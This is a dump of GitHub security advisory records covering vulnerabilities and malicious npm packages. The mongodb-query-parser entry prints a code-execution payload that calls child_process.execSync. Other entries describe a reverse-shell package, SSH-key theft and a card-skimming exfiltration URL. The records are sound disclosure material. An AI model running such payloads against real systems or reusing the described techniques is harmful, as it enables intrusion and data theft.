* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)
|
{'CVE-2020-26258'}
|
2021-11-18T15:25:26Z
|
2020-12-21T16:28:42Z
|
HIGH
| 7.7
|
{'CWE-918'}
|
{'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/', 'https://x-stream.github.io/CVE-2020-26258.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-26258', 'https://lists.debian.org/debian-lts-announce/2020/12/msg00042.html', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/', 'https://github.com/advisories/GHSA-4cch-wxpw-8p28', 'https://github.com/x-stream/xstream/security/advisories/GHSA-4cch-wxpw-8p28', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/', 'https://security.netapp.com/advisory/ntap-20210409-0005/', 'https://www.debian.org/security/2021/dsa-4828', 'https://lists.apache.org/thread.html/r97993e3d78e1f5389b7b172ba9f308440830ce5f051ee62714a0aa34@%3Ccommits.struts.apache.org%3E'}
| null |
GHSA
|
GHSA-7qm6-9v49-38m9
|
Prototype Pollution in record-like-deep-assign
|
All versions of package record-like-deep-assign are vulnerable to Prototype Pollution via the main functionality.
|
{'CVE-2021-23402'}
|
2021-12-10T18:55:39Z
|
2021-12-10T18:55:39Z
|
HIGH
| 7.3
|
{'CWE-1321', 'CWE-915'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2021-23402', 'https://snyk.io/vuln/SNYK-JS-RECORDLIKEDEEPASSIGN-1311024', 'https://github.com/advisories/GHSA-7qm6-9v49-38m9', 'https://github.com/kripod/record-like-deep-assign/blob/v1.0.1/src/mod.ts%23L17-L35'}
| null |
GHSA
|
GHSA-hgjr-632x-qpp3
|
Cross-site scripting vulnerability in file upload
|
There is a cross-site scripting vulnerability in file upload on the management system of baserCMS.
This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.
If you are eligible, please update to the new version as soon as possible.
### Target
baserCMS 4.5.1 and earlier versions
### Vulnerability
Execution of malicious JavaScript code may alter the display of the page or leak cookie information.
### Countermeasures
Update to the latest version of baserCMS
Please refer to the next page for details.
https://basercms.net/security/JVN_14134801
|
{'CVE-2021-39136'}
|
2021-08-30T16:18:59Z
|
2021-08-30T16:18:59Z
|
HIGH
| 8.7
|
{'CWE-79'}
|
{'https://basercms.net/security/JVN_14134801', 'http://jvn.jp/en/jp/JVN14134801/index.html', 'https://github.com/baserproject/basercms/security/advisories/GHSA-hgjr-632x-qpp3', 'https://github.com/advisories/GHSA-hgjr-632x-qpp3', 'https://github.com/baserproject/basercms/commit/568d4cab5ba1cdee7bbf0133c676d02a98f6d7bc', 'https://nvd.nist.gov/vuln/detail/CVE-2021-39136'}
| null |
GHSA
|
GHSA-jm35-h8q2-73mp
|
Improper one time password handling in devise-two-factor
|
### Impact
As a result of an incomplete fix for CVE-2015-7225, in versions of devise-two-factor prior to 4.0.2 it is possible to reuse a One-Time-Password (OTP) for one (and only one) immediately trailing interval.
### Patches
This vulnerability has been patched in version 4.0.2 which was released on March 24th, 2022. Individuals using this package are strongly encouraged to upgrade as soon as possible.
### Credit for discovery
Benoit Côté-Jodoin
Michael Nipper - https://github.com/tinfoil/devise-two-factor/issues/106
|
{'CVE-2021-43177'}
|
2022-04-18T22:18:24Z
|
2022-04-07T22:09:03Z
|
MODERATE
| 5.3
| null |
{'https://github.com/tinfoil/devise-two-factor/security/advisories/GHSA-jm35-h8q2-73mp', 'https://github.com/tinfoil/devise-two-factor/issues/106', 'https://github.com/advisories/GHSA-jm35-h8q2-73mp', 'https://nvd.nist.gov/vuln/detail/CVE-2021-43177'}
| null |
GHSA
|
GHSA-2473-9hgq-j7xw
|
Cross-Site Scripting in Wagtail
|
### Impact
When a form page type is made available to Wagtail editors through the `wagtail.contrib.forms` app, and the page template is built using Django's standard form rendering helpers such as `form.as_p` ([as directed in the documentation](https://docs.wagtail.io/en/stable/reference/contrib/forms/index.html#usage)), any HTML tags used within a form field's help text will be rendered unescaped in the page. Allowing HTML within help text is [an intentional design decision](https://docs.djangoproject.com/en/3.0/ref/models/fields/#django.db.models.Field.help_text) by Django; however, as a matter of policy Wagtail does not allow editors to insert arbitrary HTML by default, as this could potentially be used to carry out cross-site scripting attacks, including privilege escalation. This functionality should therefore not have been made available to editor-level users.
The vulnerability is not exploitable by an ordinary site visitor without access to the Wagtail admin.
### Patches
Patched versions have been released as Wagtail 2.7.4 (for the LTS 2.7 branch) and Wagtail 2.9.3 (for the current 2.9 branch). In these versions, help text will be escaped to prevent the inclusion of HTML tags. Site owners who wish to re-enable the use of HTML within help text (and are willing to accept the risk of this being exploited by editors) may set `WAGTAILFORMS_HELP_TEXT_ALLOW_HTML = True` in their configuration settings.
### Workarounds
Site owners who are unable to upgrade to the new versions can secure their form page templates by [rendering forms field-by-field as per Django's documentation](https://docs.djangoproject.com/en/3.0/topics/forms/#looping-over-the-form-s-fields), but omitting the `|safe` filter when outputting the help text.
### Acknowledgements
Many thanks to Timothy Bautista for reporting this issue.
### For more information
If you have any questions or comments about this advisory:
* Visit Wagtail's [support channels](https://docs.wagtail.io/en/stable/support.html)
* Email us at [security@wagtail.io](mailto:security@wagtail.io) (if you wish to send encrypted email, the public key ID is `0x6ba1e1a86e0f8ce8`)
|
{'CVE-2020-15118'}
|
2022-04-19T19:02:30Z
|
2020-07-20T17:50:30Z
|
MODERATE
| 5.7
|
{'CWE-79'}
|
{'https://github.com/wagtail/wagtail/blob/master/docs/releases/2.9.3.rst', 'https://docs.wagtail.io/en/stable/reference/contrib/forms/index.html#usage', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15118', 'https://github.com/wagtail/wagtail/security/advisories/GHSA-2473-9hgq-j7xw', 'https://github.com/advisories/GHSA-2473-9hgq-j7xw', 'https://github.com/wagtail/wagtail/commit/d9a41e7f24d08c024acc9a3094940199df94db34', 'https://docs.djangoproject.com/en/3.0/ref/models/fields/#django.db.models.Field.help_text'}
| null |
GHSA
|
GHSA-9j9m-8wjc-ff96
|
Insufficient Session Expiration in apostrophe
|
Apostrophe CMS versions between 2.63.0 to 3.3.1 affected by an insufficient session expiration vulnerability, which allows unauthenticated remote attackers to hijack recently logged-in users' sessions.
|
{'CVE-2021-25979'}
|
2021-11-19T13:29:28Z
|
2021-11-10T17:02:44Z
|
CRITICAL
| 9.8
|
{'CWE-613'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2021-25979', 'https://github.com/apostrophecms/apostrophe/commit/c211b211f9f4303a77a307cf41aac9b4ef8d2c7c', 'https://github.com/advisories/GHSA-9j9m-8wjc-ff96'}
| null |
GHSA
|
GHSA-x9j7-x98r-r4w2
|
Segmentation fault in tensorflow-lite
|
### Impact
If a TFLite saved model uses the same tensor as both input and output of an operator, then, depending on the operator, we can observe a segmentation fault or just memory corruption.
### Patches
We have patched the issue in d58c96946b and will release patch releases for all versions between 1.15 and 2.3.
We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.
### Workarounds
A potential workaround would be to add a custom `Verifier` to the model loading code to ensure that no operator reuses tensors as both inputs and outputs. Care should be taken to check all types of inputs (i.e., constant or variable tensors as well as optional tensors).
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been discovered from a variant analysis of [GHSA-cvpc-8phh-8f45](https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cvpc-8phh-8f45).
|
{'CVE-2020-15210'}
|
2021-11-19T15:11:28Z
|
2020-09-25T18:28:51Z
|
MODERATE
| 6.5
|
{'CWE-20', 'CWE-787'}
|
{'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00065.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15210', 'https://github.com/tensorflow/tensorflow/commit/d58c96946b2880991d63d1dacacb32f0a4dfa453', 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1', 'https://github.com/advisories/GHSA-x9j7-x98r-r4w2', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-x9j7-x98r-r4w2'}
| null |
GHSA
|
GHSA-8vh8-vc28-m2hf
|
Potential to access user credentials from the log files when debug logging enabled
|
A flaw was found in, all under 2.0.20, in the Undertow DEBUG log for io.undertow.request.security. If enabled, an attacker could abuse this flaw to obtain the user's credentials from the log files.
|
{'CVE-2019-10212'}
|
2022-02-11T21:13:00Z
|
2019-11-20T01:33:54Z
|
CRITICAL
| 9.8
|
{'CWE-532'}
|
{'https://access.redhat.com/errata/RHSA-2019:2998', 'https://github.com/advisories/GHSA-8vh8-vc28-m2hf', 'https://security.netapp.com/advisory/ntap-20220210-0017/', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10212', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10212', 'https://access.redhat.com/errata/RHSA-2020:0727'}
| null |
GHSA
|
GHSA-rcv7-4w2m-gj9v
|
Malicious Package in sj-tw-test-security
|
All versions of `sj-tw-test-security` contain malicious code. The package downloads and runs a script that opens a reverse shell in the system.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
| null |
2021-10-01T16:15:10Z
|
2020-09-03T23:24:26Z
|
CRITICAL
| 9.8
|
{'CWE-506'}
|
{'https://github.com/advisories/GHSA-rcv7-4w2m-gj9v', 'https://www.npmjs.com/advisories/1308'}
| null |
GHSA
|
GHSA-4pm3-f52j-8ggh
|
Improper Input Validation in GeoServer
|
### Impact
The GeoServer security mechanism can perform an unchecked JNDI lookup, which in turn can be used to perform class deserialization and result in arbitrary code execution. The same can happen while configuring data stores with data sources located in JNDI, or while setting up the disk quota mechanism.
In order to perform any of the above changes, the attack needs to have obtained admin rights and use either the GeoServer GUI, or its REST API.
### Patches
The lookups are going to be restricted in GeoServer 2.21.0, 2.20.4, 2.19.6.
### Workarounds
Protection can be achieved by making the GUI (``geoserver/web``), the REST configuration (``geoserver/rest``) and the embedded GeoWebCache configuration (``geoserver/gwc/rest``) unreachable from remote hosts, in addition to protecting access to the file system where the GeoServer configuration is stored.
|
{'CVE-2022-24847'}
|
2022-04-28T20:51:26Z
|
2022-04-22T20:39:10Z
|
HIGH
| 7.2
|
{'CWE-20'}
|
{'https://github.com/geoserver/geoserver/security/advisories/GHSA-4pm3-f52j-8ggh', 'https://github.com/geoserver/geoserver/commit/b94a69943992df999d627b21a4ed056fad4569f8', 'https://nvd.nist.gov/vuln/detail/CVE-2022-24847', 'https://github.com/advisories/GHSA-4pm3-f52j-8ggh'}
| null |
GHSA
|
GHSA-8f4m-hccc-8qph
|
Insertion of Sensitive Information into Log File in ansible
|
A flaw was found in ansible. Credentials, such as secrets, are being disclosed in console log by default and not protected by no_log feature when using those modules. An attacker can take advantage of this information to steal those credentials. The highest threat from this vulnerability is to data confidentiality.
|
{'CVE-2021-20191'}
|
2021-06-04T18:56:17Z
|
2021-06-01T21:38:33Z
|
MODERATE
| 5.5
|
{'CWE-532'}
|
{'https://github.com/advisories/GHSA-8f4m-hccc-8qph', 'https://bugzilla.redhat.com/show_bug.cgi?id=1916813', 'https://nvd.nist.gov/vuln/detail/CVE-2021-20191', 'https://access.redhat.com/security/cve/cve-2021-20191'}
| null |
GHSA
|
GHSA-jgmr-wrwx-mgfj
|
Exposure of Sensitive Information to an Unauthorized Actor and SQL Injection in Spring Data JPA
|
This affects Spring Data JPA in versions up to and including 2.1.5, 2.0.13 and 1.11.19. Derived queries using any of the predicates ?startingWith?, ?endingWith? or ?containing? could return more results than anticipated when a maliciously crafted query parameter value is supplied. Also, LIKE expressions in manually defined queries could return unexpected results if the parameter values bound did not have escaped reserved characters properly.
|
{'CVE-2019-3797'}
|
2021-08-03T21:46:37Z
|
2019-05-14T04:02:35Z
|
MODERATE
| 5.3
|
{'CWE-89', 'CWE-200'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2019-3797', 'https://github.com/advisories/GHSA-jgmr-wrwx-mgfj', 'https://pivotal.io/security/cve-2019-3797'}
| null |
GHSA
|
GHSA-97mg-3cr6-3x4c
|
Remote Code Execution in mongodb-query-parser
|
Versions of `mongodb-query-parser` prior to 2.0.0 are vulnerable to Remote Code Execution. The package fails to sanitize queries, allowing attackers to execute arbitrary code in the system. Parsing the following payload executes `touch test-file`:
```'(function () { return (clearImmediate.constructor("return process;")()).mainModule.require("child_process").execSync("touch test-file").toString()})()'```
## Recommendation
Upgrade to version 2.0.0 or later.
| null |
2020-09-04T17:27:23Z
|
2020-09-04T17:27:23Z
|
CRITICAL
| 0
| null |
{'https://github.com/advisories/GHSA-97mg-3cr6-3x4c', 'https://www.npmjs.com/advisories/1448'}
| null |
GHSA
|
GHSA-jf55-rgpx-p6rx
|
Malicious Package in iie-viz
|
Version 1.0.4 of `iie-viz` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
## Recommendation
Remove the package from your environment. It's also recommended to evaluate your application to determine whether or not user data was compromised.
| null |
2020-09-03T19:12:22Z
|
2020-09-03T19:12:22Z
|
CRITICAL
| 0
| null |
{'https://www.npmjs.com/advisories/1103', 'https://github.com/advisories/GHSA-jf55-rgpx-p6rx'}
| null |
GHSA
|
GHSA-mc84-pj99-q6hh
|
Improper Handling of Length Parameter Inconsistency in Compress
|
When reading a specially crafted ZIP archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' zip package.
|
{'CVE-2021-36090'}
|
2022-04-22T15:45:11Z
|
2021-08-02T16:55:53Z
|
HIGH
| 7.5
|
{'CWE-130'}
|
{'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://lists.apache.org/thread.html/rab292091eadd1ecc63c516e9541a7f241091cf2e652b8185a6059945@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/r25f4c44616045085bc3cf901bb7e68e445eee53d1966fc08998fc456@%3Cdev.drill.apache.org%3E', 'https://lists.apache.org/thread.html/rdd5412a5b9a25aed2a02c3317052d38a97128314d50bc1ed36e81d38@%3Cuser.ant.apache.org%3E', 'https://lists.apache.org/thread.html/r54049b66afbca766b6763c7531e9fe7a20293a112bcb65462a134949@%3Ccommits.drill.apache.org%3E', 'http://www.openwall.com/lists/oss-security/2021/07/13/6', 'https://lists.apache.org/thread.html/r67ef3c07fe3b8c1b02d48012149d280ad6da8e4cec253b527520fb2b@%3Cdev.poi.apache.org%3E', 'https://lists.apache.org/thread.html/rb064d705fdfa44b5dae4c366b369ef6597951083196321773b983e71@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/r0e87177f8e78b4ee453cd4d3d8f4ddec6f10d2c27707dd71e12cafc9@%3Cannounce.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.apache.org/thread.html/rf2f4d7940371a7c7c5b679f50e28fc7fcc82cd00670ced87e013ac88@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/rf3f0a09fee197168a813966c5816157f6c600a47313a0d6813148ea6@%3Cissues.drill.apache.org%3E', 'https://lists.apache.org/thread.html/r3227b1287e5bd8db6523b862c22676b046ad8f4fc96433225f46a2bd@%3Cissues.drill.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20211022-0001/', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://lists.apache.org/thread.html/rba65ed5ddb0586f5b12598f55ec7db3633e7b7fede60466367fbf86a@%3Cnotifications.skywalking.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2021-36090', 'https://lists.apache.org/thread.html/rb7adf3e55359819e77230b4586521e5c6874ce5ed93384bdc14d6aee@%3Cnotifications.skywalking.apache.org%3E', 'https://commons.apache.org/proper/commons-compress/security-reports.html', 'https://lists.apache.org/thread.html/rbbf42642c3e4167788a7c13763d192ee049604d099681f765385d99d@%3Cdev.drill.apache.org%3E', 'https://lists.apache.org/thread.html/r75ffc7a461e7e7ae77690fa75bd47bb71365c732e0fbcc44da4f8ff5@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/rd4332baaf6debd03d60deb7ec93bee49e5fdbe958cb6800dff7fb00e@%3Cnotifications.skywalking.apache.org%3E', 'https://lists.apache.org/thread.html/rc7df4c2f0bbe2028a1498a46d322c91184f7a369e3e4c57d9518cacf@%3Cdev.drill.apache.org%3E', 'https://lists.apache.org/thread.html/rb5fa2ee61828fa2e42361b58468717e84902dd71c4aea8dc0b865df7@%3Cnotifications.james.apache.org%3E', 'https://lists.apache.org/thread.html/r9a23d4dbf4e34d498664080bff59f2893b855eb16dae33e4aa92fa53@%3Cannounce.apache.org%3E', 'https://lists.apache.org/thread.html/rbe91c512c5385181149ab087b6c909825d34299f5c491c6482a2ed57@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/rf93b6bb267580e01deb7f3696f7eaca00a290c66189a658cf7230a1a@%3Cissues.drill.apache.org%3E', 'https://github.com/advisories/GHSA-mc84-pj99-q6hh', 'https://lists.apache.org/thread.html/r9f54c0caa462267e0cc68b49f141e91432b36b23348d18c65bd0d040@%3Cnotifications.skywalking.apache.org%3E', 'http://www.openwall.com/lists/oss-security/2021/07/13/4', 'https://lists.apache.org/thread.html/rc4134026d7d7b053d4f9f2205531122732405012c8804fd850a9b26f%40%3Cuser.commons.apache.org%3E', 'https://lists.apache.org/thread.html/rfba19167efc785ad3561e7ef29f340d65ac8f0d897aed00e0731e742@%3Cnotifications.skywalking.apache.org%3E', 'https://lists.apache.org/thread.html/r4f03c5de923e3f2a8c316248681258125140514ef3307bfe1538e1ab@%3Cdev.drill.apache.org%3E', 'https://lists.apache.org/thread.html/rb6e1fa80d34e5ada45f72655d84bfd90db0ca44ef19236a49198c88c@%3Cnotifications.skywalking.apache.org%3E', 'https://lists.apache.org/thread.html/racd0c0381c8404f298b226cd9db2eaae965b14c9c568224aa3f437ae@%3Cnotifications.skywalking.apache.org%3E'}
| null |
GHSA
|
GHSA-qwwr-qc2p-6283
|
Out-of-bounds write in libpng
|
An issue has been found in third-party PNM decoding associated with libpng 1.6.35. It is a stack-based buffer overflow in the function get_token in pnm2png.c in pnm2png.
|
{'CVE-2018-14550'}
|
2021-10-21T21:19:33Z
|
2021-03-22T16:57:07Z
|
HIGH
| 8.8
|
{'CWE-787'}
|
{'https://github.com/advisories/GHSA-qwwr-qc2p-6283', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://github.com/fouzhe/security/tree/master/libpng#stack-buffer-overflow-in-png2pnm-in-function-get_token', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://snyk.io/vuln/SNYK-UPSTREAM-LIBPNG-1043612', 'https://github.com/glennrp/libpng/issues/246', 'https://security.gentoo.org/glsa/201908-02', 'https://nvd.nist.gov/vuln/detail/CVE-2018-14550'}
| null |
GHSA
|
GHSA-hfmf-q43v-2ffj
|
Improper Key Verification in openpgp
|
Versions of `openpgp` prior to 4.2.0 are vulnerable to Improper Key Verification. The OpenPGP standard allows signature packets to have subpackets which may be hashed or unhashed. Unhashed subpackets are not cryptographically protected and cannot be trusted. The `openpgp` package does not verify whether a subpacket is hashed. Furthermore, due to the order of parsing a signature packet information from unhashed subpackets overwrites information from hashed subpackets. This may allow an attacker to modify the contents of a key certification signature or revocation signature. Doing so could convince a victim to use an obsolete key for encryption. An attack require a victim to import a manipulated key or update an existing key with a manipulated version.
## Recommendation
Upgrade to version 4.2.0 or later.
If you are upgrading from a version <4.0.0 it is highly recommended to read the `High-Level API Changes` section of the `openpgp` 4.0.0 release: https://github.com/openpgpjs/openpgpjs/releases/tag/v4.0.0
|
{'CVE-2019-9154'}
|
2021-08-17T22:08:26Z
|
2019-08-23T21:42:18Z
|
HIGH
| 7.5
|
{'CWE-347'}
|
{'https://github.com/openpgpjs/openpgpjs/pull/797/commits/47138eed61473e13ee8f05931119d3e10542c5e1', 'https://github.com/openpgpjs/openpgpjs/releases/tag/v4.2.0', 'https://www.npmjs.com/advisories/1161', 'https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Studies/Mailvelope_Extensions/Mailvelope_Extensions_pdf.html#download=1', 'https://github.com/openpgpjs/openpgpjs/pull/797', 'https://github.com/advisories/GHSA-hfmf-q43v-2ffj', 'https://nvd.nist.gov/vuln/detail/CVE-2019-9154', 'https://snyk.io/vuln/SNYK-JS-OPENPGP-460247', 'https://sec-consult.com/en/blog/advisories/multiple-vulnerabilities-in-openpgp-js/', 'http://packetstormsecurity.com/files/154191/OpenPGP.js-4.2.0-Signature-Bypass-Invalid-Curve-Attack.html'}
| null |
GHSA
|
GHSA-mc9x-v9xg-25pm
|
Exfiltrates data on installation in coffescript
|
The `coffescript` package is a piece of malware that steals sensitive data such as a user's private SSH key and bash history, sending them to attacker controlled locations.
All versions have been unpublished from the npm registry.
## Recommendation
If you have found `coffescript` installed in your environment, you should:
1. Delete the package
2. Clear your npm cache
3. Ensure it is not present in any other package.json files on your system
4. Regenerate your SSH keys, registry credentials, tokens, and any other sensitive credentials that may have been present in your bash history.
Additionally, any service which may have been exposed via credentials in your bash history or accessible via your ssh keys, such as a database, should be reviewed for indicators of compromise as well.
|
{'CVE-2017-16205'}
|
2021-01-08T18:29:34Z
|
2018-08-06T20:12:54Z
|
MODERATE
| 0
|
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/542', 'https://nodesecurity.io/advisories/542', 'https://github.com/advisories/GHSA-mc9x-v9xg-25pm', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16205'}
| null |
GHSA
|
GHSA-3j7m-hmh3-9jmp
|
Cross-Site Scripting in sanitize-html
|
Affected versions of `sanitize-html` do not sanitize input recursively, which may allow an attacker to execute arbitrary Javascript.
## Recommendation
Update to version 1.4.3 or later.
|
{'CVE-2016-1000237'}
|
2021-08-23T15:18:04Z
|
2020-04-16T03:14:47Z
|
MODERATE
| 6.1
|
{'CWE-79'}
|
{'https://github.com/punkave/sanitize-html/issues/29', 'https://github.com/apostrophecms/sanitize-html/commit/762fbc7bba389f3f789cc291c1eb2b64f60f2caf', 'https://www.npmjs.com/advisories/135', 'https://nodesecurity.io/advisories/135', 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000237', 'https://raw.githubusercontent.com/distributedweaknessfiling/cvelist/master/2016/1000xxx/CVE-2016-1000237.json', 'https://github.com/apostrophecms/sanitize-html/issues/29', 'https://github.com/advisories/GHSA-3j7m-hmh3-9jmp'}
| null |
GHSA
|
GHSA-3358-4f7f-p4j4
|
Use after free in generic-array
|
An issue was discovered in the generic-array crate before 0.13.3 for Rust. It violates soundness by using the arr! macro to extend lifetimes.
|
{'CVE-2020-36465'}
|
2021-08-25T20:56:12Z
|
2021-08-25T20:56:12Z
|
HIGH
| 7.5
|
{'CWE-416'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2020-36465', 'https://github.com/fizyk20/generic-array/issues/98', 'https://rustsec.org/advisories/RUSTSEC-2020-0146.html', 'https://github.com/advisories/GHSA-3358-4f7f-p4j4'}
| null |
GHSA
|
GHSA-9cq5-xgg4-x477
|
SQL Injection in showdoc
|
Showdoc verions 2.10.2 and prior is vulnerable to SQL injection. A patch is available in the `master` branch of the repository.
|
{'CVE-2022-0362'}
|
2022-02-10T22:30:55Z
|
2022-01-27T00:01:15Z
|
MODERATE
| 6.7
|
{'CWE-89'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2022-0362', 'https://github.com/star7th/showdoc/commit/2b34e267e4186125f99bfa420140634ad45801fb', 'https://huntr.dev/bounties/e7c72417-eb8f-416c-8480-be76ac0a9091', 'https://github.com/advisories/GHSA-9cq5-xgg4-x477'}
| null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.